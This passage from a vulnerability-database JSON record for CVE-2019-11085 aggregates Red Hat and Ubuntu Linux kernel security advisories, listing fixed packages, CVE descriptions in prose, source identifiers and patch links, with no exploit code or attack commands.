(v. 7):\n\nSource:\nkernel-3.10.0-957.27.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.27.2.el7.noarch.rpm\nkernel-doc-3.10.0-957.27.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-devel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-headers-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.27.2.el7.x86_64.rpm\nperf-3.10.0-957.27.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.27.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-957.27.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.27.2.el7.noarch.rpm\nkernel-doc-3.10.0-957.27.2.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-debug-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-devel-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-headers-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-tools-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-957.27.2.el7.ppc64.rpm\nperf-3.10.0-957.27.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\npython-perf-3.10.0-957.27.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-debug-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-devel-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-headers-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-tools-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-957.27.2.el7.ppc64le.rpm\nperf-3.10.0-957.27.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\npython-perf-3.10.0-957.27.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-957.27.2.el7.s390x.rpm\nkernel-debug-3.10.0-957.27.2.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.s390x.rpm\nkernel-debug-devel-3.10.0-957.27.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-957.27.2.el7.s390x.rpm\nkernel-devel-3.10.0-957.27.2.el7.s390x.rpm\nkernel-headers-3.10.0-957.27.2.el7.s390x.rpm\nkernel-kdump-3.10.0-957.27.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-957.27.2.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-957.27.2.el7.s390x.rpm\nperf-3.10.0-957.27.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.s390x.rpm\npython-perf-3.10.0-957.27.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.s390x.rpm\n\nx86_64:\nbpftool-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-devel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-headers-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.27.2.el7.x86_64.rpm\nperf-3.10.0-957.27.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-957.27.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-957.27.2.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.27.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-957.27.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-957.27.2.el7.noarch.rpm\nkernel-doc-3.10.0-957.27.2.el7.noarch.rpm\n\nx86_64:\nbpftool-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-devel-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-headers-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-957.27.2.el7.x86_64.rpm\nperf-3.10.0-957.27.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-957.27.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-957.27.2.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2019 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niQIVAwUBXT8OHtzjgjWX9erEAQjJ6hAAkyTYDPmFaW3TIWmrAC3QWuCJt3uBLlcX\nGNpw9Uqpj1yCc+ThaYobWnCMiSAFbPSs0A2iZnXiaM+pbsZj2MIfWRoTehoTZFDl\n60VRCW4218Id3MYioJgtgyKvGX/Ol1LLlr4VtqIL8sTUZjhV7gqN3wlRvQSHcaOW\nyIaxzWO+ci8XTQ/glXwpAfmLPsd5urYnU2IyCv+5NDvKl9TFAPFqpS8xWDnQHgT1\no82j4MQhcZPjc0n7iawrLsuCegbyATN17M0JcGi4mdoghkem2X0PWR52cpyN7Isi\nbF8x4tJv9d3IUp8Wxsk1iz0dl94F4KWJ8sP7+ScT9SForWAss4WZ9s3Kb8z7ouIO\nzzHW0C3Si2DYXxqgc/H2RAcf31sRxAzltNuiVibAyrW2gKCFw0Cdwy+U3zSloY/M\ngb3kmQQQlZrezdxvDb/vVqD6jqIhPx4ewUVIBptyvnB7Ax23K00kP6FBZoXGdbhd\nt/9e+kykPXHyi0UZXBmF/JqTj6Z0X/aA+RoqsZovHZnXZ4hrST8pYxMUsWZ6LT1O\nsxmMlId4rPN9TgW6CxxziWnMwl4XEjWIby06vxY+tATYCk0LhkOqnQ8FdU/33rYm\npI0ov4cV/T5rCBdIvGKDZumykq6eOWfIEVEZA36cs7iBgVCNYocmwKSFEVfJumpP\nkB2g6E6xyDg=SfsH\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. =========================================================================\nUbuntu Security Notice USN-4118-1\nSeptember 02, 2019\n\nlinux-aws vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 18.04 LTS\n- Ubuntu 16.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-aws-hwe: Linux kernel for Amazon Web Services (AWS-HWE) systems\n\nDetails:\n\nIt was discovered that the alarmtimer implementation in the Linux kernel\ncontained an integer overflow vulnerability. A local attacker could use\nthis to cause a denial of service. (CVE-2018-13053)\n\nWen Xu discovered that the XFS filesystem implementation in the Linux\nkernel did not properly track inode validations. An attacker could use this\nto construct a malicious XFS image that, when mounted, could cause a denial\nof service (system crash). (CVE-2018-13093)\n\nWen Xu discovered that the f2fs file system implementation in the Linux\nkernel did not properly validate metadata. An attacker could use this to\nconstruct a malicious f2fs image that, when mounted, could cause a denial\nof service (system crash). (CVE-2018-13096, CVE-2018-13097, CVE-2018-13098,\nCVE-2018-13099, CVE-2018-13100, CVE-2018-14614, CVE-2018-14615,\nCVE-2018-14616)\n\nWen Xu and Po-Ning Tseng discovered that btrfs file system implementation\nin the Linux kernel did not properly validate metadata. An attacker could\nuse this to construct a malicious btrfs image that, when mounted, could\ncause a denial of service (system crash). (CVE-2018-14609, CVE-2018-14610,\nCVE-2018-14611, CVE-2018-14612, CVE-2018-14613)\n\nWen Xu discovered that the HFS+ filesystem implementation in the Linux\nkernel did not properly handle malformed catalog data in some situations. \nAn attacker could use this to construct a malicious HFS+ image that, when\nmounted, could cause a denial of service (system crash). (CVE-2018-14617)\n\nVasily Averin and Pavel Tikhomirov discovered that the cleancache subsystem\nof the Linux kernel did not properly initialize new files in some\nsituations. A local attacker could use this to expose sensitive\ninformation. (CVE-2018-16862)\n\nHui Peng and Mathias Payer discovered that the Option USB High Speed driver\nin the Linux kernel did not properly validate metadata received from the\ndevice. A physically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2018-19985)\n\nHui Peng and Mathias Payer discovered that the USB subsystem in the Linux\nkernel did not properly handle size checks when handling an extra USB\ndescriptor. A physically proximate attacker could use this to cause a\ndenial of service (system crash). (CVE-2018-20169)\n\nZhipeng Xie discovered that an infinite loop could triggered in the CFS\nLinux kernel process scheduler. A local attacker could possibly use this to\ncause a denial of service. (CVE-2018-20784)\n\nIt was discovered that a use-after-free error existed in the block layer\nsubsystem of the Linux kernel when certain failure conditions occurred. A\nlocal attacker could possibly use this to cause a denial of service (system\ncrash) or possibly execute arbitrary code. (CVE-2018-20856)\n\nEli Biham and Lior Neumann discovered that the Bluetooth implementation in\nthe Linux kernel did not properly validate elliptic curve parameters during\nDiffie-Hellman key exchange in some situations. An attacker could use this\nto expose sensitive information. (CVE-2018-5383)\n\nIt was discovered that the Intel wifi device driver in the Linux kernel did\nnot properly validate certain Tunneled Direct Link Setup (TDLS). A\nphysically proximate attacker could use this to cause a denial of service\n(wifi disconnect). (CVE-2019-0136)\n\nIt was discovered that a heap buffer overflow existed in the Marvell\nWireless LAN device driver for the Linux kernel. An attacker could use this\nto cause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2019-10126)\n\nIt was discovered that the Bluetooth UART implementation in the Linux\nkernel did not properly check for missing tty operations. A local attacker\ncould use this to cause a denial of service. (CVE-2019-10207)\n\nAmit Klein and Benny Pinkas discovered that the Linux kernel did not\nsufficiently randomize IP ID values generated for connectionless networking\nprotocols. A remote attacker could use this to track particular Linux\ndevices. (CVE-2019-10638)\n\nAmit Klein and Benny Pinkas discovered that the location of kernel\naddresses could exposed by the implementation of connection-less network\nprotocols in the Linux kernel. \n(CVE-2019-10639)\n\nAdam Zabrocki discovered that the Intel i915 kernel mode graphics driver in\nthe Linux kernel did not properly restrict mmap() ranges in some\nsituations. A local attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-11085)\n\nIt was discovered that an integer overflow existed in the Linux kernel when\nreference counting pages, leading to potential use-after-free issues. A\nlocal attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2019-11487)\n\nJann Horn discovered that a race condition existed in the Linux kernel when\nperforming core dumps. A local attacker could use this to cause a denial of\nservice (system crash) or expose sensitive information. (CVE-2019-11599)\n\nIt was discovered that a null pointer dereference vulnerability existed in\nthe LSI Logic MegaRAID driver in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2019-11810)\n\nIt was discovered that a race condition leading to a use-after-free existed\nin the Reliable Datagram Sockets (RDS) protocol implementation in the Linux\nkernel. The RDS protocol is blacklisted by default in Ubuntu. If enabled, a\nlocal attacker could use this to cause a denial of service (system crash)\nor possibly execute arbitrary code. (CVE-2019-11815)\n\nIt was discovered that the ext4 file system implementation in the Linux\nkernel did not properly zero out memory in some situations. A local\nattacker could use this to expose sensitive information (kernel memory). \n(CVE-2019-11833)\n\nIt was discovered that the Bluetooth Human Interface Device Protocol (HIDP)\nimplementation in the Linux kernel did not properly verify strings were\nNULL terminated in certain situations. A local attacker could use this to\nexpose sensitive information (kernel memory). (CVE-2019-11884)\n\nIt was discovered that a NULL pointer dereference vulnerabilty existed in\nthe Near-field communication (NFC) implementation in the Linux kernel. An\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-12818)\n\nIt was discovered that the MDIO bus devices subsystem in the Linux kernel\nimproperly dropped a device reference in an error condition, leading to a\nuse-after-free. An attacker could use this to cause a denial of service\n(system crash). (CVE-2019-12819)\n\nIt was discovered that a NULL pointer dereference vulnerability existed in\nthe Near-field communication (NFC) implementation in the Linux kernel. A\nlocal attacker could use this to cause a denial of service (system crash). A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2019-13233)\n\nJann Horn discovered that the ptrace implementation in the Linux kernel did\nnot properly record credentials in some situations. A local attacker could\nuse this to cause a denial of service (system crash) or possibly gain\nadministrative privileges. (CVE-2019-13272)\n\nIt was discovered that the GTCO tablet input driver in the Linux kernel did\nnot properly bounds check the initial HID report sent by the device. A\nphysically proximate attacker could use to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-13631)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate meta data, leading to a buffer overread. A local attacker\ncould use this to cause a denial of service (system crash). \n(CVE-2019-14283)\n\nIt was discovered that the floppy driver in the Linux kernel did not\nproperly validate ioctl() calls, leading to a division-by-zero. A local\nattacker could use this to cause a denial of service (system crash). \n(CVE-2019-14284)\n\nTuba Yavuz discovered that a race condition existed in the DesignWare USB3\nDRD Controller device driver in the Linux kernel. A physically proximate\nattacker could use this to cause a denial of service. (CVE-2019-14763)\n\nIt was discovered that an out-of-bounds read existed in the QLogic QEDI\niSCSI Initiator Driver in the Linux kernel. A local attacker could possibly\nuse this to expose sensitive information (kernel memory). (CVE-2019-15090)\n\nIt was discovered that the Raremono AM/FM/SW radio device driver in the\nLinux kernel did not properly allocate memory, leading to a use-after-free. \nA physically proximate attacker could use this to cause a denial of service\nor possibly execute arbitrary code. (CVE-2019-15211)\n\nIt was discovered at a double-free error existed in the USB Rio 500 device\ndriver for the Linux kernel. A physically proximate attacker could use this\nto cause a denial of service. (CVE-2019-15212)\n\nIt was discovered that a race condition existed in the Advanced Linux Sound\nArchitecture (ALSA) subsystem of the Linux kernel, leading to a potential\nuse-after-free. A physically proximate attacker could use this to cause a\ndenial of service (system crash) pro possibly execute arbitrary code. \n(CVE-2019-15214)\n\nIt was discovered that a race condition existed in the CPiA2 video4linux\ndevice driver for the Linux kernel, leading to a use-after-free. A\nphysically proximate attacker could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2019-15215)\n\nIt was discovered that a race condition existed in the Softmac USB Prism54\ndevice driver in the Linux kernel. A physically proximate attacker could\nuse this to cause a denial of service (system crash). (CVE-2019-15220)\n\nIt was discovered that a use-after-free vulnerability existed in the\nAppletalk implementation in the Linux kernel if an error occurs during\ninitialization. A local attacker could use this to cause a denial of\nservice (system crash). (CVE-2019-15292)\n\nIt was discovered that the Empia EM28xx DVB USB device driver\nimplementation in the Linux kernel contained a use-after-free vulnerability\nwhen disconnecting the device. An attacker could use this to cause a denial\nof service (system crash). (CVE-2019-2024)\n\nIt was discovered that the USB video device class implementation in the\nLinux kernel did not properly validate control bits, resulting in an out of\nbounds buffer read. A local attacker could use this to possibly expose\nsensitive information (kernel memory). (CVE-2019-2101)\n\nIt was discovered that the Marvell Wireless LAN device driver in the Linux\nkernel did not properly validate the BSS descriptor. A local attacker could\npossibly use this to cause a denial of service (system crash) or possibly\nexecute arbitrary code. (CVE-2019-3846)\n\nJason Wang discovered that an infinite loop vulnerability existed in the\nvirtio net driver in the Linux kernel. A local attacker in a guest VM could\npossibly use this to cause a denial of service in the host system. \n(CVE-2019-3900)\n\nDaniele Antonioli, Nils Ole Tippenhauer, and Kasper B. Rasmussen discovered\nthat the Bluetooth protocol BR/EDR specification did not properly require\nsufficiently strong encryption key lengths. A physicall proximate attacker\ncould use this to expose sensitive information. (CVE-2019-9506)\n\nIt was discovered that the Appletalk IP encapsulation driver in the Linux\nkernel did not properly prevent kernel addresses from being copied to user\nspace. A local attacker with the CAP_NET_ADMIN capability could use this to\nexpose sensitive information. (CVE-2018-20511)\n\nIt was discovered that a race condition existed in the USB YUREX device\ndriver in the Linux kernel. A physically proximate attacker could use this\nto cause a denial of service (system crash). (CVE-2019-15216)\n\nIt was discovered that the Siano USB MDTV receiver device driver in the\nLinux kernel made improper assumptions about the device characteristics. A\nphysically proximate attacker could use this cause a denial of service\n(system crash). (CVE-2019-15218)\n\nIt was discovered that the Line 6 POD USB device driver in the Linux kernel\ndid not properly validate data size information from the device. A\nphysically proximate attacker could use this to cause a denial of service\n(system crash). (CVE-2019-15221)\n\nMuyu Yu discovered that the CAN implementation in the Linux kernel in some\nsituations did not properly restrict the field size when processing\noutgoing frames. A local attacker with CAP_NET_ADMIN privileges could use\nthis to execute arbitrary code. (CVE-2019-3701)\n\nVladis Dronov discovered that the debug interface for the Linux kernel\u0027s\nHID subsystem did not properly validate passed parameters in some\nsituations. A local privileged attacker could use this to cause a denial of\nservice (infinite loop). (CVE-2019-3819)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 18.04 LTS:\n  linux-image-4.15.0-1047-aws     4.15.0-1047.49\n  linux-image-aws                 4.15.0.1047.46\n\nUbuntu 16.04 LTS:\n  linux-image-4.15.0-1047-aws     4.15.0-1047.49~16.04.1\n  linux-image-aws-hwe             4.15.0.1047.47\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4118-1\n  CVE-2018-13053, CVE-2018-13093, CVE-2018-13096, CVE-2018-13097,\n  CVE-2018-13098, CVE-2018-13099, CVE-2018-13100, CVE-2018-14609,\n  CVE-2018-14610, CVE-2018-14611, CVE-2018-14612, CVE-2018-14613,\n  CVE-2018-14614, CVE-2018-14615, CVE-2018-14616, CVE-2018-14617,\n  CVE-2018-16862, CVE-2018-19985, CVE-2018-20169, CVE-2018-20511,\n  CVE-2018-20784, CVE-2018-20856, CVE-2018-5383, CVE-2019-0136,\n  CVE-2019-10126, CVE-2019-10207, CVE-2019-10638, CVE-2019-10639,\n  CVE-2019-11085, CVE-2019-11487, CVE-2019-11599, CVE-2019-11810,\n  CVE-2019-11815, CVE-2019-11833, CVE-2019-11884, CVE-2019-12818,\n  CVE-2019-12819, CVE-2019-12984, CVE-2019-13233, CVE-2019-13272,\n  CVE-2019-13631, CVE-2019-14283, CVE-2019-14284, CVE-2019-14763,\n  CVE-2019-15090, CVE-2019-15211, CVE-2019-15212, CVE-2019-15214,\n  CVE-2019-15215, CVE-2019-15216, CVE-2019-15218, CVE-2019-15220,\n  CVE-2019-15221, CVE-2019-15292, CVE-2019-2024, CVE-2019-2101,\n  CVE-2019-3701, CVE-2019-3819, CVE-2019-3846, CVE-2019-3900,\n  CVE-2019-9506\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1047.49\n  https://launchpad.net/ubuntu/+source/linux-aws-hwe/4.15.0-1047.49~16.04.1\n. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n\nBug Fix(es):\n\n* kernel-rt: update to the RHEL8.0.z batch#2 source tree (BZ#1717516)\n\n4",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-11085"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      },
      {
        "db": "BID",
        "id": "108488"
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11085"
      },
      {
        "db": "PACKETSTORM",
        "id": "156405"
      },
      {
        "db": "PACKETSTORM",
        "id": "153789"
      },
      {
        "db": "PACKETSTORM",
        "id": "153728"
      },
      {
        "db": "PACKETSTORM",
        "id": "154326"
      },
      {
        "db": "PACKETSTORM",
        "id": "153828"
      },
      {
        "db": "PACKETSTORM",
        "id": "156548"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-11085",
        "trust": 3.4
      },
      {
        "db": "BID",
        "id": "108488",
        "trust": 2.0
      },
      {
        "db": "JVN",
        "id": "JVNVU92328381",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003441",
        "trust": 1.6
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-004721",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "156405",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0549",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0693",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2155",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2256",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2753",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2231",
        "trust": 0.6
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2019.2171",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "153719",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "156527",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-761",
        "trust": 0.6
      },
      {
        "db": "VULMON",
        "id": "CVE-2019-11085",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153789",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153728",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "154326",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "153828",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156548",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2019-11085"
      },
      {
        "db": "BID",
        "id": "108488"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-003441"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-004721"
      },
      {
        "db": "PACKETSTORM",
        "id": "156405"
      },
      {
        "db": "PACKETSTORM",
        "id": "153789"
      },
      {
        "db": "PACKETSTORM",
        "id": "153728"
      },
      {
        "db": "PACKETSTORM",
        "id": "154326"
      },
      {
        "db": "PACKETSTORM",
        "id": "153828"
      },
      {
        "db": "PACKETSTORM",
        "id": "156548"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201905-761"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-11085"
      }
    ]
  },
  "id": "VAR-201905-1057",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.5336601066666667
  },
  "last_update_date": "2024-06-14T20:19:15.536000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "INTEL-SA-00249 - IntelR i915 Graphics for Linux Advisory",
        "trust": 1.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00249.html"
      },
      {
        "title": "INTEL-SA-00234 - IntelR SCS Discovery Utility and IntelR ACU Wizard Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00234.html"
      },
      {
        "title": "INTEL-SA-00244 - IntelR QuartusR Software Advisory",
        "trust": 0.8,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00244.html"
      },
      {
